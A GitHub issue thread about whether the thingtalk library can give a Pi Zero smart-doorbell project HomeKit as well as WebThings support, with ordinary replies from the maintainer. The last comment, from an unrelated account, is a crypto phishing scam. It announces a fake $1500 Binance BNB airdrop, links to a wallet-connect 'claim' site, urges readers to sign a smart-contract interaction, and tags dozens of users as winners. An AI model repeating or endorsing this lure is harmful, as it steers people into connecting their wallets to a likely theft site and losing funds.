### ISSUE TITLE
Homekit support?

### ISSUE THREAD

**Issue by flatsiedatsie** [hidaris/thingtalk#10]
I noticed in the examples there is a Homekit example. Looking through it I tried to figure out if it is somehow Homekit compatible, but couldn't figure it out.

- Would this library be able to make things not only Webthings compatible, but Homekit as well?

I ask because I'm working on a [privacy focussed smart doorbell](https://github.com/createcandle/candlecam) (based on a Pi zero). The project currently uses the webthings python library. My downstairs neighbour uses Homekit, and making the doorbell Homekit compatible would make the project relevant to him.

- Can this library be used without requiring the code to be run through a `uvicorn test:app --reload` command?

**Comment by hidaris** [comment]
@flatsiedatsie Yes, I tried to bridge zigbee2mqtt to the homekit via thingtalk a few months ago.
`Can this library be used without requiring the code to be run through a uvicorn test:app --reload command?`
How would you like to use it?

**Comment by flatsiedatsie** [comment]
Ah, so Zigbee2MQTT has homekit support somehow? I've actually worked on the Zigbee2MQTT addon for webthings, which is available now.

> How would you like to use it?

I'd like to use it in an addon for the Webthings Gateway. So the python file would be loaded by the Gateway, and not started from the commandline.

**Comment by hidaris** [comment]
@flatsiedatsie I saw your work, it's great! homekit protocol supports third-party takeover of homekit devices also supports reverse emulation of homekit devices, if you want webthing to become a homekit device, you need to run a web server, I'm not very familiar with gateway's plug-in development, does gateway's plug-in support to run as a web server?

**Comment by flatsiedatsie** [comment]
I'm currently working on an addon that does exactly this. It is both and addon, and it also runs a webthing server on port 8889 at the same time.

https://github.com/createcandle/candlecam

The addon currently builds on the Webthings python webserver code. I was curious if switching to your code had any significant benefits.

**Comment by hidaris** [comment]
Oh, I see, if that's the case, when using thingtalk, you need to run the homekit service at the same time, and then your doorbell can support both webthing and homekit, but the problem is that I don't have a doorbell to use for testing.

**Comment by flatsiedatsie** [comment]
I don't believe Webthings doorbells are even for sale ;-)

**Comment by hidaris** [comment]
Aha, silly me, I will try to make a doorbell with candlecam.

**Comment by flatsiedatsie** [comment]
Be my guest :-)

**Comment by highpolar-shubham** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @Cryptoshakeela, @joao-vasconcelos, @shuxiaokai, @pesho, @hzheng, @cloudrat, @Cris-wong-gen, @alexandruvidu, @jfaccioli, @espi1ce, @kenzasam, @novboy, @ajimenezr23, @wingsuitist, @clittell, @ftunholm, @expase, @ArchTaqi, @esdrasbrz, @jneighbo, @andantonyan, @sam26880, @PBehr, @reddyharsha06, @aretcamgoz, @fturturo, @MrGregRS, @cerenka14, @elkno, @BR00l
